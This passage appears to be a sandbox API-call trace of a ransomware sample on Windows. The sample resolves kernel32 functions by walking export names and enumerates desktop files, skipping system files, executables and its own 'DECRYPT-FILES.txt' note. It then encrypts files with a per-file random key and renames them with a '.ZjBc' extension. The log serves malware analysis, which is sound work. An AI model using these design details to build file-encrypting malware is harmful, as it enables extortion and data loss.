lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0082.943] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0082.943] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0082.943] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0082.943] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0082.943] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0082.943] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0082.943] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0082.943] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0082.943] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0082.943] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0082.943] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0082.943] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0082.944] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0082.944] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0082.944] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0082.944] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0082.944] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0082.944] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0082.944] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0082.944] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0082.944] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0082.944] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0082.944] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0082.944] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0082.944] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0082.944] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0082.944] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0082.944] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0082.945] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi") returned 57 [0082.945] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi.ZjBc") returned 62 [0082.945] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\80e-wr5nx5kx nm.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\80E-WR5Nx5kX NM.avi.ZjBc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\80e-wr5nx5kx nm.avi.zjbc"), dwFlags=0x0) returned 1 [0082.945] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.945] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.946] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.946] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd677710, ftCreationTime.dwHighDateTime=0x1d4c643, ftLastAccessTime.dwLowDateTime=0xb0f3dbb0, ftLastAccessTime.dwHighDateTime=0x1d4c628, ftLastWriteTime.dwLowDateTime=0xb0f3dbb0, ftLastWriteTime.dwHighDateTime=0x1d4c628, nFileSizeHigh=0x0, nFileSizeLow=0x6345, dwReserved0=0x0, dwReserved1=0x0, cFileName="C99dHX1L.avi", cAlternateFileName="")) returned 1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="DECRYPT-FILES.txt") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="autorun.inf") returned 1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="boot.ini") returned 1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="desktop.ini") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="ntuser.dat") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="iconcache.db") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="bootsect.bak") returned 1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="ntuser.dat.log") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="thumbs.db") returned -1 [0082.946] lstrcmpiW (lpString1="C99dHX1L.avi", lpString2="Bootfont.bin") returned 1 [0082.946] lstrlenW (lpString="C99dHX1L.avi") returned 12 [0082.946] lstrcmpiW (lpString1="avi", lpString2="lnk") returned -1 [0082.946] lstrcmpiW (lpString1="avi", lpString2="exe") returned -1 [0082.946] lstrcmpiW (lpString1="avi", lpString2="sys") returned -1 [0082.946] lstrcmpiW (lpString1="avi", lpString2="dll") returned -1 [0082.946] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned 38 [0082.946] lstrlenW (lpString="C99dHX1L.avi") returned 12 [0082.946] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" [0082.946] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpString2="C99dHX1L.avi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi" [0082.946] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.947] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\C99dHX1L.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\c99dhx1l.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x438 [0082.947] GetFileSizeEx (in: hFile=0x438, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=25413) returned 1 [0082.947] CreateFileMappingW (hFile=0x438, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x43c [0082.947] MapViewOfFile (hFileMappingObject=0x43c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0082.947] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0082.947] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0082.947] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.948] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0082.948] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0082.948] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.949] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0082.949] CloseHandle (hObject=0x43c) returned 1 [0082.949] SetFilePointerEx (in: hFile=0x438, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.949] WriteFile (in: hFile=0x438, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0082.950] CloseHandle (hObject=0x0) returned 0 [0082.950] CloseHandle (hObject=0x438) returned 1 [0082.950] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.950] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0082.950] GetTickCount () returned 0x114d356 [0082.950] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0082.951] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0082.951] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0082.951] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0082.951] lstrlenA (lpString="kernel32.dll") returned 12 [0082.951] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0082.951] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0082.951] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0082.951] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0082.951] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0082.951] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0082.952] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0082.952] lstrlenA (lpString="ADDATOMA") returned 8 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0082.952] lstrlenA (lpString="ADDATOMW") returned 8 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0082.952] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0082.952] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0082.952] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.952] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.952] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.952] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.952] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.952] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.952] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.952] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.952] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.952] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.952] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.952] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.952] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.952] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.953] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.953] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.953] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.953] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.953] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.953] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.953] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.953] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.953] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.953] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.953] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.953] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.953] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.953] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.953] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.953] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.953] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.953] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.953] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.953] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.954] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.954] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.954] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.954] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.954] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.954] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.954] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.954] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.954] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.954] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.954] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.954] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.954] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.954] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.954] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.954] lstrlenA (lpString="BEEP") returned 4 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.954] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.954] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.954] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.955] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.955] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.955] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.955] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.955] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.955] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") 